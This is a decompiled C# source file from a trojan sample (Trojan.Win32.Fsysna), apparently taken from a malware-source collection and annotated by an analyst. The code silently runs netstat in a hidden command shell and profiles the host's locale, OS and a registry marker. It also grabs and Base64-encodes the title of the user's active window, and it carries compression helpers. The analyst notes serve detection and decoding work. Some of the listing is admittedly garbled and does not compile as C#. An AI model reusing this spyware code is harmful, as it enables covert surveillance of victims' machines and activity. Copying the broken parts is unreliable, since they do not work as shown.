MalwareSourceCode/MSIL/Trojan/Win32/F/Trojan.Win32.Fsysna.wh-0adec5f2e37dcb28180512f882c1aec3a7f939bf33e4147587c7b7277719444b/API.cs

// Decompiled with JetBrains decompiler
// Type: n.API
// Assembly: n, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BFCF94BC-F711-4A63-941E-52FC7F306AC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Fsysna.wh-0adec5f2e37dcb28180512f882c1aec3a7f939bf33e4147587c7b7277719444b.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.VisualBasic.MyServices;
using n.My;
using System;
using System.Collections;
using System.Diagnostics;
using System.IO;
using System.IO.Compression;
using System.Runtime.InteropServices;
using System.Text;
namespace n
{
[StandardModule]
internal sealed class API
{
// Locale constants that belong with the GetLocaleInfo P/Invoke declared in this class.
// The methods visible in this file pass the literals 1024U and 7U rather than these names.
// NOTE(review): in the Windows SDK the value 1024 (0x0400) is LOCALE_USER_DEFAULT, while
// LOCALE_SYSTEM_DEFAULT is 0x0800. The name chosen here is therefore misleading: a lookup
// made with 1024 follows the current user's locale, not the system default.
private const uint LOCALE_SYSTEM_DEFAULT = 1024;
// 7 is LOCALE_SABBREVCTRYNAME in the Windows SDK: the abbreviated country/region name.
private const uint LOCALE_SABBREVCTRYNAME = 7;
// Analyst summary: converts the lines of "netstat -o" output (supplied by Gt) into a single
// delimited string describing the host's connections and the process that owns each one.
//
// Parameter A: array of output lines; each element is converted to a string.
// Returns: records joined by '!', each of the form
//   <module file name or process name>:<pid>,<field1>,<field2>,<field3>,<field4>
// with the final '!' stripped. If no empty line follows the table, str1 is never assigned.
//
// NOTE(review): several locals (flag, str3, enumerator) are read before any visible assignment.
// These are decompiler artifacts of VB.NET locals that are default-initialised and live for the
// whole method; the listing does not compile as C# in this form and should be read as a
// description of behaviour only.
public static string fx(ref Array A)
{
string str1;
try
{
foreach (object obj in A)
{
string str2 = Conversions.ToString(obj);
// flag marks "the column header has been seen"; it only makes sense if it persists across
// iterations, although the decompiler declares it inside the loop body.
bool flag;
// The header row of the netstat table contains "Local Address"; rows before it are ignored.
if (Strings.InStr(str2, "Local Address") > 0)
flag = true;
else if (flag)
{
// Accumulator for the records built so far (same persistence caveat as flag).
string str3;
// The first empty line after the table ends parsing: drop the trailing '!' and stop.
if (Operators.CompareString(str2, "", false) == 0)
{
str1 = Strings.Mid(str3, 1, str3.Length - 1);
break;
}
// Whitespace normalisation before splitting into columns.
// NOTE(review): as rendered on this page the search and replacement strings are identical,
// which would never terminate for a line containing a space. Presumably the binary replaces
// two spaces with one and the page collapsed the whitespace; confirm against the sample.
do
{
str2 = Strings.Replace(str2, " ", " ");
}
while (Strings.InStr(str2, " ") > 0);
string[] strArray = Strings.Split(str2);
string str4;
try
{
// strArray[5] is used as the owning process id. The executable's file name (last path
// component of MainModule.FileName) is paired with that id.
str4 = Strings.Split(Process.GetProcessById(Conversions.ToInteger(strArray[5])).MainModule.FileName, "\\")[Strings.Split(Process.GetProcessById(Conversions.ToInteger(strArray[5])).MainModule.FileName, "\\").Length - 1] + ":" + strArray[5];
}
catch (Exception ex)
{
// Any failure above (for example a process whose main module cannot be read) falls back to
// the bare process name. This fallback is not itself guarded: an exception here leaves fx,
// because the outer try has only a finally clause.
ProjectData.SetProjectError(ex);
str4 = Process.GetProcessById(Conversions.ToInteger(strArray[5])).ProcessName + ":" + strArray[5];
ProjectData.ClearProjectError();
}
// Append one record. Column 3 is lower-cased and the local computer name in it is replaced
// with "127.0.0.1"; columns 1, 2 and 4 are copied unchanged.
// presumably columns 1-4 are protocol, local address, foreign address and state, following
// the netstat layout; verify against real output.
str3 = str3 + str4 + "," + strArray[1] + "," + strArray[2] + "," + strArray[3].ToLower().Replace(MyProject.Computer.Name.ToLower(), "127.0.0.1") + "," + strArray[4] + "!";
}
}
}
finally
{
// Compiler-generated enumerator cleanup for the foreach; the decompiler lost the link
// between this local and the loop's enumerator.
IEnumerator enumerator;
if (enumerator is IDisposable)
(enumerator as IDisposable).Dispose();
}
return str1;
}
// Analyst summary: collects the host's connection table by driving a hidden command
// interpreter, then hands the output to fx for formatting.
//
// Returns: whatever fx produces for the captured output lines.
//
// Telemetry note: the command text is written to the interpreter's standard input, so it does
// not appear on the command line of the "cmd" process itself. Process-creation logging would
// presumably still record netstat being launched as a child of that windowless cmd instance,
// which is the more useful event to key on.
public static string Gt()
{
// No shell execute, all three standard streams redirected, no console window created.
Process process = Process.Start(new ProcessStartInfo()
{
UseShellExecute = false,
RedirectStandardError = true,
RedirectStandardInput = true,
RedirectStandardOutput = true,
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
FileName = "cmd"
});
// "-o" adds the owning process id column that fx reads; "exit" ends the interpreter so that
// ReadToEnd below can complete.
process.StandardInput.WriteLine("netstat -o");
process.StandardInput.WriteLine("exit");
// This reader is created but never used; the output is read through process.StandardOutput.
StreamReader streamReader = new StreamReader(process.StandardOutput.BaseStream);
// Split the captured output on CRLF. The Process object is neither waited on nor disposed.
Array A = (Array) Strings.Split(process.StandardOutput.ReadToEnd(), "\r\n");
return API.fx(ref A);
}
// Analyst summary: GZip-compresses or decompresses a byte array, using a slightly non-standard
// framing that matters when writing a decoder for captured data.
//
// Parameter Byt: the bytes to compress, or a buffer previously produced by the compress branch.
// Parameter Compress: true to compress, false to decompress (passed by ref but only read).
// Returns: the compressed buffer (with one extra trailing byte) or the decompressed bytes.
//
// Framing detail: the compress branch allocates Length + 1 bytes, so its output is a complete
// GZip stream followed by one zero byte. The decompress branch compensates by reading the
// 4-byte length field at Length - 5 instead of Length - 4.
public static byte[] ZIP(byte[] Byt, ref bool Compress)
{
if (Compress)
{
MemoryStream memoryStream = new MemoryStream();
// leaveOpen = true keeps memoryStream usable after the GZip stream is disposed (flushed).
GZipStream gzipStream = new GZipStream((Stream) memoryStream, CompressionMode.Compress, true);
gzipStream.Write(Byt, 0, Byt.Length);
gzipStream.Dispose();
memoryStream.Position = 0L;
// One byte larger than the compressed data; the last byte stays zero.
byte[] buffer = new byte[(int) memoryStream.Length + 1];
memoryStream.Read(buffer, 0, buffer.Length);
memoryStream.Dispose();
return buffer;
}
MemoryStream memoryStream1 = new MemoryStream(Byt);
GZipStream gzipStream1 = new GZipStream((Stream) memoryStream1, CompressionMode.Decompress);
byte[] buffer1 = new byte[4];
// Read the 4 bytes that precede the final byte of the input. With the extra padding byte this
// is presumably the GZip trailer's uncompressed-size field; confirm against RFC 1952.
memoryStream1.Position = memoryStream1.Length - 5L;
memoryStream1.Read(buffer1, 0, 4);
int int32 = BitConverter.ToInt32(buffer1, 0);
memoryStream1.Position = 0L;
// NOTE(review): the output size comes straight from the input with no validation. An input
// shorter than 5 bytes or carrying a negative or very large size field makes this branch
// throw or allocate excessively, so an analysis tool decoding such buffers should bound the
// size itself rather than copy this logic.
byte[] array = new byte[int32 - 1 + 1];
// A single Read call: nothing here loops if fewer than int32 bytes are returned.
gzipStream1.Read(array, 0, int32);
gzipStream1.Dispose();
memoryStream1.Dispose();
return array;
}
// Base64 helpers. Base64 is an encoding, not encryption: strings produced by these methods can
// be decoded directly during analysis.
// FEN: raw bytes -> Base64 text.
public static string FEN(byte[] data) => Convert.ToBase64String(data);
// FDE: Base64 text -> raw bytes.
public static byte[] FDE(string base64) => Convert.FromBase64String(base64);
// ENB: string -> UTF-8 bytes -> Base64 text. The argument is passed by ref but not modified.
public static string ENB(ref string s) => Convert.ToBase64String(Encoding.UTF8.GetBytes(s));
// DEB: Base64 text -> bytes -> UTF-8 string (inverse of ENB). The argument is not modified.
public static string DEB(ref string s) => Encoding.UTF8.GetString(Convert.FromBase64String(s));
// P/Invoke declaration for the kernel32 locale query used by Gcc.
// No CharSet or EntryPoint is given, so the default ANSI marshalling applies; presumably this
// binds to the GetLocaleInfoA export, which would be the name to look for in the import data.
// Locale: locale identifier; LCType: which locale field to fetch; lpLCData: output buffer;
// cchData: size of that buffer in characters.
[DllImport("kernel32.dll")]
private static extern int GetLocaleInfo(
uint Locale,
uint LCType,
[Out] StringBuilder lpLCData,
int cchData);
// Fetches one locale field as a string.
// Parameter lInfo: the LCTYPE value identifying the field to read.
// Returns: the field text, or an empty string when the native call reports no data.
private static string Gcc(uint lInfo)
{
StringBuilder lpLCData = new StringBuilder(256);
// 1024U is the locale identifier (0x0400, LOCALE_USER_DEFAULT in the Windows SDK).
int localeInfo = API.GetLocaleInfo(1024U, lInfo, lpLCData, lpLCData.Capacity);
// The code treats the return value as a length that counts one character more than the text
// (presumably the terminating null), hence localeInfo - 1.
return localeInfo > 0 ? lpLCData.ToString().Substring(0, localeInfo - 1) : string.Empty;
}
// Returns the locale field with LCTYPE 7 (LOCALE_SABBREVCTRYNAME, the abbreviated
// country/region name) by way of Gcc; A0 places it in the host profile.
public static string Gc() => API.Gcc(7U);
// Analyst summary: builds a short host-profile string, one item per CRLF-terminated line:
//   1. B.PC   (defined outside this file; contents not visible here)
//   2. abbreviated country/region from Gc(), or "X" on failure
//   3. the OS full name, or "X" on failure
//   4. "Yes" if HKEY_CURRENT_USER has a value named "p" directly on the root key, else "No"
//   5. B.ver  (defined outside this file)
// The text is then shortened and returned with a fixed trailer appended.
//
// Host indicator: a value named "p" on the root of HKEY_CURRENT_USER is an unusual location.
// This method only reads it; what writes it and what it means cannot be determined from this
// file, so treat it as a candidate marker to confirm elsewhere in the sample.
public static string A0()
{
// Assigned but never used in this method.
RegistryProxy registry = MyProject.Computer.Registry;
string str1 = B.PC + "\r\n";
string str2;
try
{
str2 = str1 + API.Gc() + "\r\n";
}
catch (Exception ex)
{
// Each step substitutes "X" on failure so the line layout of the profile is preserved.
ProjectData.SetProjectError(ex);
str2 = str1 + "X\r\n";
ProjectData.ClearProjectError();
}
string str3;
try
{
str3 = str2 + MyProject.Computer.Info.OSFullName + "\r\n";
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
str3 = str2 + "X\r\n";
ProjectData.ClearProjectError();
}
string str4;
try
{
// Enumerates the value names on the HKEY_CURRENT_USER root key itself, not on a subkey.
foreach (string valueName in MyProject.Computer.Registry.CurrentUser.GetValueNames())
{
// Case-sensitive comparison (TextCompare = false) against the single-letter name "p".
if (Operators.CompareString(valueName, "p", false) == 0)
{
str4 = str3 + "Yes\r\n";
goto label_12;
}
}
}
catch (Exception ex)
{
// A registry error is swallowed and falls through to the "No" line below.
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
str4 = str3 + "No\r\n";
label_12:
string Expression = str4 + B.ver;
string str5;
try
{
// Shortens the profile: removes "Microsoft", abbreviates "Windows" to "Win", strips the
// registered and trademark signs.
// NOTE(review): the last replacement shows identical search and replacement strings on this
// page; presumably the binary collapses a double space and the page lost the whitespace.
str5 = Strings.Replace(Strings.Replace(Strings.Replace(Expression, "Microsoft", ""), "Windows", "Win").Replace("®", "").Replace("™", ""), " ", " ");
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
str5 = Expression + "X\r\n";
ProjectData.ClearProjectError();
}
// Fixed trailer appended to every profile string.
return str5 + "\r\n \r\n ";
}
// user32 P/Invoke declarations used by A1 to identify the window the user is working in.
// All four use ANSI marshalling; the two text functions bind explicitly to the "A" exports.
// GetForegroundWindow: handle of the window currently in the foreground.
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr GetForegroundWindow();
// GetWindowThreadProcessId: writes the owning process id of a window into lpdwProcessID.
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int GetWindowThreadProcessId(IntPtr hwnd, ref int lpdwProcessID);
// GetWindowText (GetWindowTextA): copies the window title into a caller-supplied string buffer,
// marshalled VB-style by reference.
[DllImport("user32.dll", EntryPoint = "GetWindowTextA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int GetWindowText(IntPtr hWnd, [MarshalAs(UnmanagedType.VBByRefStr)] ref string WinTitle, int MaxLength);
// GetWindowTextLength (GetWindowTextLengthA): length of the window title.
// NOTE(review): the handle is declared as long here but as IntPtr in the declarations above;
// the two only have the same size in a 64-bit process.
[DllImport("user32.dll", EntryPoint = "GetWindowTextLengthA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int GetWindowTextLength(long hwnd);
// Analyst summary: returns the title of the window the user currently has in the foreground,
// Base64-encoded through ENB. Active-window titles reveal which application or document is
// in use; how callers use the value is not visible in this file.
//
// Parameter p: not read anywhere in this method.
// Returns: Base64 of the UTF-8 title, or an empty string when there is no foreground window
// or any step throws.
public static string A1(ref bool p)
{
string str1;
try
{
IntPtr foregroundWindow = API.GetForegroundWindow();
if (foregroundWindow == IntPtr.Zero)
{
str1 = "";
}
else
{
int windowTextLength = API.GetWindowTextLength((long) foregroundWindow);
// Pre-fill a buffer of '*' one character longer than the reported title length; the native
// call overwrites it in place.
string str2 = Strings.StrDup(windowTextLength + 1, "*");
API.GetWindowText(foregroundWindow, ref str2, windowTextLength + 1);
// Passed by ref without a visible initialiser (decompiler artifact of a VB local).
int lpdwProcessID;
API.GetWindowThreadProcessId(foregroundWindow, ref lpdwProcessID);
if (lpdwProcessID == 0)
{
// No owning process id obtained: use the title read directly from the window.
str1 = API.ENB(ref str2);
}
else
{
try
{
// Prefer the owning process's main-window title over the text read from the handle.
string mainWindowTitle = Process.GetProcessById(lpdwProcessID).MainWindowTitle;
str1 = API.ENB(ref mainWindowTitle);
}
catch (Exception ex)
{
// The process lookup failed: fall back to the title read from the handle.
ProjectData.SetProjectError(ex);
str1 = API.ENB(ref str2);
ProjectData.ClearProjectError();
}
}
}
}
catch (Exception ex)
{
// Any other failure is swallowed and reported as an empty title.
ProjectData.SetProjectError(ex);
str1 = "";
ProjectData.ClearProjectError();
}
return str1;
}
// Thin wrapper around user32 ShowWindow, giving the sample control over the visibility state
// of a window identified by its handle. Who calls it, and on which windows, is not visible here.
public class wd
{
// The values match the Windows SDK nCmdShow constants: SW_HIDE (0), SW_SHOWNORMAL (1),
// SW_SHOWMINIMIZED (2), SW_SHOWMAXIMIZED (3), SW_SHOW (5) and SW_RESTORE (9).
public const int HIDE = 0;
public const int Normal = 1;
public const int Minimized = 2;
public const int Maximized = 3;
public const int Show = 5;
public const int RESTORE = 9;
// Instance field; nothing in this file reads or writes it.
public int hWnd;
// Forwards the handle and show command to ShowWindow; the native return value is discarded.
public static void G(ref int hwd, ref int A) => API.wd.ShowWindow(hwd, A);
// NOTE(review): the handle is declared as a 32-bit int rather than IntPtr, so it would not
// hold a full-width handle in a 64-bit process.
[DllImport("User32")]
public static extern int ShowWindow(int hwnd, int nCmdShow);
}
}
}